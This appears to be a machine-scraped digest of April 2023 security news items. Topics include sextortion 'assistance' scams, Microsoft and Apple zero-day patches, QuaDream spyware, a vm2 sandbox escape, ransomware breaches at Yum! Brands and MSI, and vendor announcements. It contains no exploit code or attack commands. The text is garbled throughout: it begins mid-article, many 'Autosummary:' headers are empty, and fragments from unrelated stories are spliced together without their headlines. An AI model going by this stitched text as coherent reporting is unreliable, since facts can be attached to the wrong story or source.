Signs to watch out for: A company representative contacts you and offers assistance services for which the company charges fees; The company advertises sextortion assistance in exchange for fees; You are asked to pay the fees before the assistance services are rendered; The company requires you to sign a contract for their services; The company representative discourages you from contacting law enforcement or tells you contacting law enforcement is not the best way to get help; The company uses high-pressure or scare tactics in an effort to secure your business; or The for-profit company claims to be connected to government or law enforcement officials.Here’s some examples provided by the FBI with regard to what bogus assistance looks like in practice, and how the "assistance" can make things worse: A company solicited multiple payments totaling $5,000 from a juvenile sextortion victim after coercing the victim with threats of reputational harm, falsely indicating the victim would be unable to go to college or get a job and the victim’s parents would lose their jobs. The whack-a-mole technique, and how "help" can make things worse This is somewhat similar to those mugshot sites, which scrape mugshots and place them online along with the details of the person in the photograph. Malwarebytes tips for dealing with sextortion We have many tips for all aspects of romance and sextortion attempts, and here’s some of the main things you can do to help yourself avoid sextortion fraud: Don"t panic . "Categories: News Tags: Google Pay Tags: Google Pay bug Tags: free money All good things must end, they say, including generous offers of rewards caused by a short-lived glitch in Google Pay. |
The post Google Pay accidentally handed out free money, bug now fixed appeared first on Malwarebytes Labs.
"Autosummary:
And, yes, if wrongfully rewarded users already transferred or spent the money they received, it"s theirs to keep, the team said. "SentinelOne has unveiled integrations with key industry players Aruba, Checkpoint, Cisco, Darktrace, Extrahop, Fortinet, Palo Alto Networks and an enhanced collaboration with Vectra AI which expand the company’s firewall and NDR capabilities, and will allow organizations of all sizes to gain the insights they need to rapidly identify and respond to attacks across all vectors. “The integration of firewalls and NDR capabilities perfectly complements our XDR solutions,” said Akhil Kapoor, VP, Technology Partnerships, SentinelOne. “In … More
The post SentinelOne announces integration of firewalls and NDR capabilities with key industry players appeared first on Help Net Security.
"Autosummary:
SentinelOne has unveiled integrations with key industry players Aruba, Checkpoint, Cisco, Darktrace, Extrahop, Fortinet, Palo Alto Networks and an enhanced collaboration with Vectra AI which expand the company’s firewall and NDR capabilities, and will allow organizations of all sizes to gain the insights they need to rapidly identify and respond to attacks across all vectors. "DirectDefense has partnered with Claroty which empowers organizations with visibility, protection, and threat detection to secure their Extended Internet of Things (XIoT), a vast network of cyber-physical systems across industrial, healthcare, and commercial environments. As digital transformation efforts have intensified over the last decade, a broad range of XIoT assets – including operational technology (OT), the Internet of Medical Things (IoMT), building management systems (BMS) and enterprise IoT – are now interconnected. While this drives … More
The post DirectDefense and Claroty join forces to secure XIoT environments appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"The Qualys Threat Research Unit (TRU) has been hard at work detecting vulnerabilities worldwide, and its latest report is set to shake up the industry. In this Help Net Security interview, Travis Smith, VP of the Qualys TRU, talks about the 2023 Qualys TruRisk Threat Research Report, which provides security teams with data-backed insights to help them better understand how adversaries exploit vulnerabilities and render attacks. What are the most dangerous cyber threats to look … More
The post Data-backed insights for future-proof cybersecurity strategies appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, Travis Smith, VP of the Qualys TRU, talks about the 2023 Qualys TruRisk Threat Research Report, which provides security teams with data-backed insights to help them better understand how adversaries exploit vulnerabilities and render attacks. All organizations must tighten processes across the various platforms – dev, testing, staging, and production. While the 2023 TruRisk Research report conducted an in-depth review of the top 163 vulnerabilities, there were an additional 500 vulnerabilities released prior to 2022 that were weaponized or exploited for the first time in 2022. Over the last few years, threat actors have shifted tactics to mature into extortion-ware, whereby they exfiltrate and encrypt data. "11:11 Systems has revealed general availability of 11:11 Managed SteelDome in partnership with SteelDome Cyber. The fully managed service is designed for organizations in need of secure, scalable and cost-efficient storage of their unstructured, on-premises data. Leveraging SteelDome’s InfiniVault application technology, 11:11 Managed SteelDome provides on-premises data storage, protection and recovery. This new offering provides data immutability and protection from ransomware attacks and optimizes data storage, all while meeting strict compliance and regulatory requirements. Acting … More
The post 11:11 Systems Managed SteelDome provides protection from ransomware attacks appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Microsoft has also updated its advisory for CVE-2013-3900, a WinVerifyTrust signature validation vulnerability, to include the following Server Core installation versions - Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for x65-based Systems Service Pack 2 Windows Server 2008 R2 for x64-based Systems Service 1 Windows Server 2012 Windows Server 2012 R2 Windows Server 2016 Windows Server 2019, and Windows Server 2022 The development comes as North Korea-linked threat actors have been observed leveraging the flaw to incorporate encrypted shellcode into legitimate libraries without invalidating the Microsoft-issued signature. "AI company OpenAI launched a bug bounty program and announced payouts of up to $20,000 for security flaws in its ChatGPT chatbot service. OpenAI launched a bug bounty program and it is offering up to $20,000 to bug hunters that will report vulnerabilities in its ChatGPT chatbot service. The company explained that ChatGPT is in […]
The post OpenAI launched a bug bounty program appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ChatGPT) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Microsoft has addressed a zero-day in the Windows Common Log File System (CLFS) actively exploited in ransomware attacks. Microsoft has addressed a zero-day vulnerability, tracked as CVE-2023-28252, in the Windows Common Log File System (CLFS), which is actively exploited in ransomware attacks. Microsoft fixed the issue with the release of Patch Tuesday security updates for […]
The post Cybercrime group exploits Windows zero-day in ransomware attacks appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, zero-day) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Oxeye discovered a new vulnerability (CVE-2023-0620) in the HashiCorp Vault Project, an identity-based secrets and encryption management system that controls access to API encryption keys, passwords, and certificates. The vulnerability was an SQL injection vulnerability that potentially could lead to a Remote Code Execution (RCE). Oxeye reported this vulnerability to HashiCorp, and the team quickly patched it in versions 1.13.1, 1.12.5, and 1.11.9. of Vault. HashiCorp Vault HashiCorp Vault provides encryption services for modern, microservices-based … More
The post HashiCorp Vault vulnerability could lead to RCE, patch today! (CVE-2023-0620) appeared first on Help Net Security.
"Autosummary:
Oxeye discovered a new vulnerability (CVE-2023-0620) in the HashiCorp Vault Project, an identity-based secrets and encryption management system that controls access to API encryption keys, passwords, and certificates. "Autosummary:
Internet scans carried out by the Citizen Lab reveal that QuaDream"s customers operated 600 servers from several countries around the world between late 2021 and early 2023, including Bulgaria, Czech Republic, Hungary, Romania, Ghana, Israel, Mexico, Singapore, the U.A.E., and Uzbekistan. "Autosummary:
"Autosummary:
"Autosummary:
Redmond has also attached an "exploitation more likely" tag to CVE-2023-21554, given that it"s "aware of past instances of this type of vulnerability being exploited," which makes it "an attractive target for attackers. "At least five members of civil society worldwide have been targeted with spyware and exploits developed by surveillance firm QuaDream. Citizen Lab researchers reported that at least five civil society members were victims of spyware and exploits developed by the Israeli surveillance firm QuaDream. The victims include journalists, political opposition figures, and an NGO worker […]
The post QuaDream surveillance firm’s spyware targeted iPhones with zero-click exploit appeared first on Security Affairs.
"Autosummary:
CitizenLab identified QuaDream servers in multiple countries, including Bulgaria, Czech Republic, Hungary, Ghana, Israel, Mexico, Romania, Singapore, United Arab Emirates (UAE), and Uzbekistan. Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, zero-day) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Categories: Exploits and vulnerabilities Categories: News Tags: Microsoft Tags: Apple Tags: Google Tags: Adobe Tags: Cisco Tags: SAP Tags: Mozilla Tags: CVE-2023-28252 Tags: CVE-2023-28231 Tags: CVE-2023-21554 Tags: Word Tags: Publisher Tags: Office One fixed vulnerability is being actively exploited by a ransomware gang and many others were fixed in this month"s Patch Tuesday updates. |
The post Update now! April’s Patch Tuesday includes a fix for one zero-day appeared first on Malwarebytes Labs.
"Autosummary:
Adobe has released security updates for several products: Apple released emergency updates for two known-to-be-exploited vulnerabilities. CISA has already added the CVE-2023-28252 Windows zero-day to its catalog of Known Exploited Vulnerabilities, which means federal (FCEB) agencies have until May 2, 2023 to patch against it. "Categories: Ransomware Categories: Threat Intelligence In the last 12 months, the UK has been second only to the USA in terms of ransomware attacks, and its education sector has been subjected to a feeding frenzy by Vice Society. |
The post Ransomware in the UK: April 2022–March 2023 appeared first on Malwarebytes Labs.
"Autosummary:
Known attacks by the ten most used ransomware in the UK, April 2022 - March 2023 In fact, the UK is one of Vice Society"s favourite targets, accounting for 21% of the group"s known attacks in the last 12 months, a close second to the USA which accounted for 23%, and vastly more than the next country, Spain, which accounted for 8%. In January 2023, Britain"s multinational postal service, Royal Mail, was attacked by LockBit, arguably the world"s most dangerous ransomware, which demanded the biggest ransom we have ever seen anywhere, in any country: $80 million. In 2023, the BBC reported on 14 schools in the UK that were attacked by Vice Society including Carmel College, St Helens, Durham Johnston Comprehensive School (hacked in 2021, documents posted online in January 2022), and Frances King School of English, London/Dublin.Our analysis of total known attacks, known attacks per $1T of GDP, and known attacks per capita, shows that ransomware gangs treated the entire Anglosphere, not just the USA, as their prime hunting ground.On that basis, the USA and the UK suffered nearly identical rates of attack, at around 50 known attacks per $1T. Measured this way, the UK is third, almost a mirror of its Atlantic cousin and quite different from its geographic and economic near neighbours, France and Germany. Known ransomware attacks by month on the UK education sector, by gang, April 2022 - March 2023 It is worth remembering that our numbers only reflect attacks where a ransom wasn"t paid, and the true number of attacks is far larger. "Categories: News Categories: Ransomware Tags: The Habit Burger Grill Tags: KFC Tags: Pizza Hut Tags: Yum! Brands Tags: ransomware Yum! Brands, owner of KFC, Pizza Hut, and other fast food chains, was breached in January. It recently found employee data has been compromised. |
The post KFC, Pizza Hut owner employee data stolen in ransomware attack appeared first on Malwarebytes Labs.
"Autosummary:
Brands, the fast-food chain operator behind The Habit Burger Grill, KFC, Pizza Hut, and Taco Bell, has begun sending Notice of Security Breach letters to employees whose data were potentially affected. "While the Company"s response to this incident is ongoing, at this time we do not believe such impact of the incident will ultimately have a material adverse effect on our business, results of operations or financial condition," the company says in its 2022 annual report to the SEC which it filed on Friday.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. "Some sectors have high confidence in their in-house cybersecurity expertise, while others prefer to enlist the support of an external provider to keep their systems and data secured
The post What are the cybersecurity concerns of SMBs by sector? appeared first on WeLiveSecurity
"Autosummary:
With a majority of SMBs in technology and telecoms (69%), manufacturing and industrial (67%), and financial services (74%) preferring to outsource their security needs, a question that remains elusive from this survey is: Which specific business types in these verticals are prioritizing continuing in-house management, and what are their specific reasons? Retail, wholesale, and distribution Four in five (80%) retail, wholesale, and distribution SMBs have moderate or high confidence in their in-house cybersecurity expertise, the most of any sector.A total of 32% of SMBs surveyed reported use of endpoint detection and response (EDR), extended detection and response (XDR), or managed detection and response (MDR) and 33% plan to leverage the technology in the next 12 months. "Hyundai disclosed a data breach that impacted Italian and French car owners and clients who booked a test drive. Hyundai has suffered a data breach that impacted Italian and French car owners and customers who booked a test drive. Threat actors had access to the email addresses, physical addresses, telephone numbers, and vehicle chassis numbers […]
The post Hyundai suffered a data breach that impacted customers in France and Italy appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Hyundai) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"While applications like Slack and Teams have transformed how we collaborate and communicate, cybersecurity training has not kept pace with these advancements. Most security training is still being delivered through web-based learning management systems, according to CybSafe. Often, important security information gets lost in the noise. Only half of the workers interviewed paid attention to emailed content. Furthermore, 20% of employees said they could not remember or find relevant cybersecurity information. In this Help Net … More
The post How to transform cybersecurity learning and make content more engaging appeared first on Help Net Security.
"Autosummary:
"Apple has pushed out security updates that fix two actively exploited zero-day vulnerabilities (CVE-2023-28205, CVE-2023-28206) in macOS, iOS and iPadOS. Reported by researchers Clément Lecigne of Google’s Threat Analysis Group (TAG) and Donncha Ó Cearbhaill, the head of Amnesty International’s Security Lab, the vulnerabilities have been exploited in tandem to achieve full device compromise – with the likely (though not confirmed) goal to install spyware on target devices. About the vulnerabilities CVE-2023-28205 is a use … More
The post Apple rushes fixes for exploited zero-days in iPhones and Macs (CVE-2023-28205, CVE-2023-28206) appeared first on Help Net Security.
"Autosummary:
Security updates for Macs, iPhones and iPads are available Since Friday (April 7), Apple has released security updates for newer macOS (13.3.1), iOS and iPad OS (16.4.1) versions, and then quickly backported the patches to fix the flaws in older (macOS 12.6.5 and 11.7.6, and iOS/iPad 15.7.5) versions. "Autosummary:
"The most popular application categories to hide malware and unwanted software include cryptocurrency trackers, financial apps, QR-code scanners, and even dating apps," Kaspersky said in a new report based on messages posted on online forums between 2019 and 2023. "Autosummary:
"The bad actors used typosquatting techniques to deploy a custom malicious payload [...] which targets the Exodus crypto wallet and leaks the victim"s credentials to cryptocurrency exchanges, by using code injection," Shachar Menashe, senior director at JFrog Security Research, said. "Apple released updates to backport patches addressing two actively exploited zero-day vulnerabilities in older iPhones, iPads, and Macs. Apple has released emergency updates to backport security patches that address two actively exploited zero-day flaws also affecting older iPhones, iPads, and Macs. On April 7, 2023, Apple has released emergency security updates to address two actively exploited zero-day […]
The post Apple released emergency updates to fix recently disclosed zero-day bugs on older devices appeared first on Security Affairs.
"Autosummary:
Monterey 12.6.5, and macOS Big Sur 11.7.6: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), iPod touch (7th generation), and Macs running macOS "Autosummary:
"Autosummary:
The stolen database contains all public forum posts, staff forum posts, private messages sent between users, and forum member data, including usernames, email addresses, and encrypted (hashed and salted) passwords generated by the MyBB (v1.8.27) software. "Autosummary:
Selling the source code of a loader for $20,000 (Kaspersky) To promote these loaders, the sellers publish videos showcasing their features, user-friendly interface, granular targeting filters, and more. "Yum! Brands, the company that owns the KFC, Pizza Hut, and Taco Bell brands, disclosed a data breach after the January ransomware attack. On January 13, 2023, Yum! Brands suffered a cyberattack that forced the company to take its systems offline closing roughly 300 restaurants in the UK for one day. Now the company, which owns the […]
The post Yum! Brands, the owner of KFC, Taco Bell and Pizza Hut, discloses data breach appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Yum! Brands) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
" However, while the OpenAI Application Programming Interface (API) and its ChatGPT artificial-intelligence chatbot are in-scope targets for bounty hunters, the company asked researchers to report model issues via a separate form unless they have a security impact. "Autosummary:
The campaign has been underway since November 2022, and according to NTT"s security analyst Rintaro Koike, it shifted up a gear after February 2023, expanding its targeting scope to cover users who speak Japanese, Korean, and Spanish. "Autosummary:
Redmond has patched at least 32 local privilege escalation vulnerabilities in the Windows CLFS driver since 2018, with three of them (CVE-2022-24521, CVE-2022-37969, and CVE-2023-23376) also exploited in the wild as zero-days, according to Kaspersky. "Autosummary:
The number of bugs in each vulnerability category is listed below: 20 Elevation of Privilege Vulnerabilities 8 Security Feature Bypass Vulnerabilities 45 Remote Code Execution Vulnerabilities 10 Information Disclosure Vulnerabilities 9 Denial of Service Vulnerabilities 6 Spoofing Vulnerabilities This count does not include seventeen Microsoft Edge vulnerabilities fixed on April 6th. "It’s April 2023 Patch Tuesday, and Microsoft has released fixes for 97 CVE-numbered vulnerabilities, including one actively exploited zero-day (CVE-2023-28252). About CVE-2023-28252 CVE-2023-28252 is a vulnerability in the Windows Common Log File System (CLFS) that allows attackers to gain SYSTEM privileges on target machines. “Over the last two years, attackers appear to have found success targeting CLFS in order to elevate privileges as part of post-compromise activity,” Satnam Narang, senior staff research engineer at Tenable, … More
The post Microsoft patches zero-day exploited by attackers (CVE-2023-28252) appeared first on Help Net Security.
"Autosummary:
“Over the last two years, attackers appear to have found success targeting CLFS in order to elevate privileges as part of post-compromise activity,” Satnam Narang, senior staff research engineer at Tenable, told Help Net Security.It’s April 2023 Patch Tuesday, and Microsoft has released fixes for 97 CVE-numbered vulnerabilities, including one actively exploited zero-day (CVE-2023-28252). "Autosummary:
"Categories: Apple Categories: Exploits and vulnerabilities Categories: News Tags: iOS 16.4.1 Tags: iPadOS 16.4.1 Tags: macOS 13.3.1 Tags: CVE-2023-28206 Tags: CVE-2023-28205 Tags: use-after-free Tags: out-of-bounds write Tags: IOSurfaceAccelerator Apple has released iOS 16.4.1, iPadOS 16.4.1, and macOS 13.3.1 for the iPhone, iPad, and Mac, respectively, and our advice is to install them as soon as possible. |
The post Apple releases emergency updates for two known-to-be-exploited vulnerabilities appeared first on Malwarebytes Labs.
"Autosummary:
On Friday April 7, 2023, Apple released iOS 16.4.1, iPadOS 16.4.1, and macOS 13.3.1 for the iPhone, iPad, and Mac, respectively, and our advice is to install them as soon as possible because all three updates include important security fixes.Posted: April 11, 2023 by Apple has released iOS 16.4.1, iPadOS 16.4.1, and macOS 13.3.1 for the iPhone, iPad, and Mac, respectively, and our advice is to install them as soon as possible. "People reveal more personal information when you ask them the same questions a second time – according to new research from the University of East Anglia. A new study reveals how simple repetition can make people over-disclose, and potentially put themselves at risk of identity theft and cybercrime. The research team say that understanding why people disclose personal data could help inform measures to address the problem. People over-disclose personal data From subscribing to online … More
The post Cybercriminals use simple trick to obtain personal data appeared first on Help Net Security.
"Autosummary:
The price of privacy The research team asked 27 study participants for a range of personal information online including their height, weight and phone number as well as their opinions on topics including immigration, abortion, and politics. "Autosummary:
"Autosummary:
"Autosummary:
Gcore is an international leader in public cloud and edge computing, content delivery, hosting, and security solutions, with protection servers based on high-performance Intel® Xeon® Scalable processors.A successful data breach can cost millions of dollars, and the amount depends directly on the type of attack and its duration, as well as the loss of reputation, customer loyalty, and the customers themselves. 2 — Cloud security According to more data by Statista, cloud security is the fastest-growing segment in the IT security market, with a projected growth of nearly 27% from 2022 to 2023. "Autosummary:
The websites include fake tech support, fraudulent lottery wins, and rogue CAPTCHA pages urging users to turn on notifications to "Please Allow to verify, that you are not a robot," thereby enabling the actors to send spam ads. "Autosummary:
"Autosummary:
According to the company"s general conditions agreement, this data may include tax information, government ID numbers, addresses, full names, birth dates, phone numbers, bank account numbers, employee evaluations, and more. "Autosummary:
"Autosummary:
"Autosummary:
"On January 18, 2023, we announced a ransomware attack that impacted certain IT Systems which resulted in the closure of fewer than 300 restaurants in one market for one day, temporarily disrupted certain of our affected systems and resulted in data being taken from our network," the company said in its 2022 annual report filed with the U.S. Securities and Exchange Commission (SEC) on Friday. "US Cybersecurity and Infrastructure Security Agency (CISA) added two flaws in iPhones, Macs, and iPads to its Known Exploited Vulnerabilities catalog. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the following five new issues to its Known Exploited Vulnerabilities Catalog: This week Apple has released emergency security updates to address the above actively exploited zero-day […]
The post CISA adds zero-day bugs in iPhones, Macs, and iPads to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.
"Autosummary:
U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the following five new issues to its Known Exploited Vulnerabilities Catalog: CVE-2023-28205 – Apple Multiple Products WebKit Use-After-Free Vulnerability; CVE-2023-28206 – Apple iOS, iPadOS, and macOS IOSurfaceAccelerator Out-of-Bounds Write Vulnerability; This week Apple has released emergency security updates to address the above actively exploited zero-day vulnerabilities impacting iPhones, Macs, and iPads. "Belgian HR giant SD Worx was forced to shut down its IT infrastructure for its UK and Ireland services after a cyber attack. HR and payroll management firm SD Worx shut down its IT systems for its UK and Ireland services after a cyber attack. The company employs more than 7,000 HR professionals and serves over […]
The post SD Worx shuts down UK and Ireland services after cyberattack appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, SD Worx) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Andrey Shevlyakov, an Estonian national, was charged in the US with conspiracy and other charges related to acquiring U.S.-made electronics on behalf of the Russian government and military. The Estonian man is accused of having helped the Russian government and military to purchase US-made electronics and hacking tools. The defendant was arrested in Estonia on […]
The post Estonian National charged with helping Russia acquire U.S. hacking tools and electronics appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Estonian National) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "The development team behind the vm2 JavaScript sandbox library addressed a critical Remote Code Execution vulnerability. The developers behind the vm2 JavaScript sandbox module have addressed a critical vulnerability, tracked as CVE-2023-29017 (CVSS score 9.8), that could be exploited to execute arbitrary shellcode. vm2 is a sandbox that can run untrusted code in an isolated context […]
The post Researchers disclose critical sandbox escape bug in vm2 sandbox library appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"Autosummary:
It"s also tracked by the cybersecurity community under various names, including Boggy Serpens, Cobalt Ulster, Earth Vetala, ITG17, Mercury, Seedworm, Static Kitten, TEMP.Zagros, and Yellow Nix. "Autosummary:
"Autosummary:
"Autosummary:
"Currently, the affected systems have gradually resumed normal operations, with no significant impact on financial business," the company said in a brief notice shared on Friday. "US CISA has added Veritas Backup Exec flaws, which were exploited in ransomware attacks, to its Known Exploited Vulnerabilities catalog. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the following five new issues to its Known Exploited Vulnerabilities Catalog: This week Mandiant researchers reported that an affiliate of the ALPHV/BlackCat ransomware gang, tracked as UNC4466, was observed […]
The post CISA adds Veritas Backup Exec flaws to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.
"Autosummary:
"Organizations follow a reactive approach to cybersecurity which is stifling their progress in demonstrating value and aligning with business outcomes, according to WithSecure. 83% of respondents surveyed in the study were interested in, planning to adopt, or expanding their adoption of outcome-based security solutions and services. Reactive cybersecurity approach prevails in most organizations However, the study also found that most organizations currently approach cybersecurity on a reactive basis. 60% of survey respondents said they react … More
The post Outcome-based cybersecurity paves way for organizational goals appeared first on Help Net Security.
"Autosummary:
The most common outcomes that respondents wanted security to support included risk management, with 44% of survey respondents wanting to reduce risk to meet their top cybersecurity goals; customer experience, with 40% of respondents wanting security to improve customer experience; and revenue growth, which was highlighted by 34% of respondents. "The answer to the question “Why does software continue to have so many vulnerabilities?” is complex, because the software itself is so complex. There’ve been many articles written that cover the lack of tools to test for vulnerabilities, the security knowledge and experience of the developers themselves, the endless variations of interactions between operating systems and applications, and the complexity of the network environments into which the software is deployed to name but a few … More
The post April 2023 Patch Tuesday forecast: The vulnerability discovery race appeared first on Help Net Security.
"Autosummary:
There’ve been many articles written that cover the lack of tools to test for vulnerabilities, the security knowledge and experience of the developers themselves, the endless variations of interactions between operating systems and applications, and the complexity of the network environments into which the software is deployed to name but a few contributing factors. Prizes were also awarded for exploitation of Apple macOS, Adobe Reader, Microsoft SharePoint, VMware Workstation, and even a Tesla in the automotive category. "Autosummary:
"Autosummary:
The following versions of Nexx smart home devices are affected - Nexx Garage Door Controller (NXG-100B, NXG-200) - Version nxg200v-p3-4-1 and prior Nexx Smart Plug (NXPG-100W) - Version nxpg100cv4-0-0 and prior Nexx Smart Alarm (NXAL-100) - Version nxal100v-p1-9-1and prior "Successful exploitation of these vulnerabilities could allow an attacker to receive sensitive information, execute application programmable interface (API) requests, or hijack devices," CISA said. "Phishers are targeting YouTube content creators by leveraging the service’s Share Video by Email feature, which delivers the phishing email from an official YouTube email address (no-reply@youtube.com). How the YouTube phishing email scam works? The email informs the targets of a new monetization policy, new rules, and prompts them to view a video. The email also contains and points to a document hosted on Google Drive and provides the password for opening it. Finally, the … More
The post Phishing emails from legit YouTube address hitting inboxes appeared first on Help Net Security.
"Autosummary:
TeamYouTube (@TeamYouTube) April 4, 2023 Social media content creator Kevin Breeze has warned YouTube about this particular scam and noted that this is not a simple case of spoofed email, but rather a more sophisticated attack where scammers are taking advantage of the platform’s sharing system. "Microsoft announced it has taken legal action to disrupt the illegal use of copies of the post-exploitation tool Cobalt Strike by cybercriminals. Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named ‘Beacon’ on the victim machine. The Beacon includes a wealth of functionality for the attacker, including, but […]
The post Microsoft aims at stopping cybercriminals from using cracked copies of Cobalt Strike appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Phishing) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
In a public service announcement published on Friday, the FBI said that such companies use a wide range of methods, from threats and manipulation to feeding the victims false information, to persuade sextortion victims into paying exorbitant fees for their help. "Autosummary:
"Scammer-operated Telegram channels sometimes post what appears to be exceptionally generous offers, for example, zipped up sets of ready-to-use phishing kits that target a large number of global and local brands," Svistunova said. "Autosummary:
"Autosummary:
VM2 has more than 16 million monthly downloads via the NPM package repository and it is used by integrated development environments (IDEs) and code editors, function-as-a-service (FaaS) solutions, pen-testing frameworks, security tools, and various JavaScript-related products. "Autosummary:
"Multinational IT corporation MSI (Micro-Star International) confirms security breach after Money Message ransomware gang claimed the hack. This week the ransomware gang Money Message announced to have hacked the Taiwanese multinational IT corporation MSI (Micro-Star International). Micro-Star International AKA MSI designs, manufactures, and sells motherboards and graphics cards for customers in the United States, Canada, and […]
The post MSI confirms security breach after Money Message ransomware attack appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, MSI) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Initial access in ransomware attack Of the five vulnerabilities that CISA added to the catalog of Known Exploited Vulnerabilities (KEV) today, only one was rated critical, an issue in Veritas’ data protection software tracked as CVE-2021-27877 that allows remote access and command execution with elevated privileges. "Apple released emergency security updates to address two actively exploited zero-day vulnerabilities impacting iPhones, Macs, and iPads. Apple has released emergency security updates to address two actively exploited zero-day vulnerabilities, tracked as CVE-2023-28205 and CVE-2023-28206, impacting iPhones, Macs, and iPads. Impacted devices include: Both vulnerabilities were reported by Clément Lecigne of Google’s Threat Analysis Group […]
The post Apple addressed two actively exploited zero-day flaws appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, zero-day) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "The impact of identity fraud varies for organizations in the financial services industry, based on whether they belong to the banking or FinTech sector, according to Regula. Specifically, every fourth bank reported experiencing over 100 identity fraud incidents in the past year (26% of organizations), while this number is lower (17%) for the FinTech sector. Economic damage When asked to evaluate the cost of the identity fraud they had experienced, the banking sector was found … More
The post The staggering cost of identity fraud for financial services appeared first on Help Net Security.
"Autosummary:
Specifically, for the banking sector, the second-largest cost resulting from identity fraud is penalties and fines (36%), while for FinTech organizations, it is the loss of current and potential clients (40%). "Despite the decline in network-detected malware in Q4 2022, endpoint ransomware spiked by 627%, while malware associated with phishing campaigns persisted as a threat, according to WatchGuard. Malware going undetected Despite seeing an overall decline in malware, further analysis from WatchGuard Threat Lab researchers looking at Fireboxes that decrypt HTTPS (TLS/SSL) traffic found a higher incidence of malware, indicating malware activity has shifted to encrypted traffic. Since just ~20% of Fireboxes that provide data for … More
The post The hidden picture of malware attack trends appeared first on Help Net Security.
"Autosummary:
Malware going undetected Despite seeing an overall decline in malware, further analysis from WatchGuard Threat Lab researchers looking at Fireboxes that decrypt HTTPS (TLS/SSL) traffic found a higher incidence of malware, indicating malware activity has shifted to encrypted traffic. “A continuing and concerning trend in our data and research shows that encryption – or, more accurately, the lack of decryption at the network perimeter – is hiding the full picture of malware attack trends,” said Corey Nachreiner, CSO at WatchGuard. "Industrial Defender has unveiled the launch of Phoenix, an OT security solution tailored to the needs of SMBs. Phoenix is revolutionizing how smaller industrial organizations approach OT security by providing visibility into all their OT assets and their associated cyber risks. By providing a solution that is easy to deploy and cost-effective, Phoenix enables SMBs to overcome resource barriers and secure their operations effectively. “From ransomware campaigns to nation-state attacks, cyber threats against industrial organizations … More
The post Industrial Defender launches Phoenix to secure SMBs operations appeared first on Help Net Security.
"Autosummary:
Suited for environments with up to 200 endpoints, Phoenix provides a quick, automated view of all OT assets and vital endpoint information including: Device type, make, model and serial number Software and firmware User accounts Ports and services Configuration details Phoenix provides a quick on-ramp to asset discovery by monitoring network communication. "Resecurity has recently identified the STYX Innovation Marketplace, a new cybercriminal e-commerce platform with a specialized focus on financial fraud and money laundering. STYX launched at the beginning of 2023. This platform is specifically designed to facilitate financial crime, providing cybercriminals with a range of services, including stolen financial data, credit card information, forged documents, money laundering services, victim reconnaissance ‘lookups’, and more. This discovery illustrates the post- pandemic menace of cyber-enabled financial crime and … More
The post Resecurity uncovers STYX, new cybercriminal platform focused on financial fraud appeared first on Help Net Security.
"Autosummary:
This platform is specifically designed to facilitate financial crime, providing cybercriminals with a range of services, including stolen financial data, credit card information, forged documents, money laundering services, victim reconnaissance ‘lookups’, and more. Beyond institutional cybersecurity, FIs must also evolve their anti-money- laundering (AML), KYC, fraud prevention, and cyber units beyond yesterday’s divisional silos. "Organizations globally are under tremendous pressure to address evolving threats like ransomware, zero-day vulnerabilities, and espionage, and they face challenges in extending security coverage across multiple environments and dealing with an ongoing skills shortage, according to Bitdefender. “The results of this survey demonstrate, more than ever, the importance of layered security that delivers advanced threat prevention, detection and response across the entire business while improving efficiencies that allow security teams to do more with less,” … More
The post IT and security pros pressured to keep quiet about data breaches appeared first on Help Net Security.
"Autosummary:
At 71%, IT/security professions in the US were the most likely to say they have been told to keep quiet followed by the UK at 44%, Italy at 36.7%, Germany 35.3%, Spain 34.8% and France 26.8%. "Autosummary:
"Autosummary:
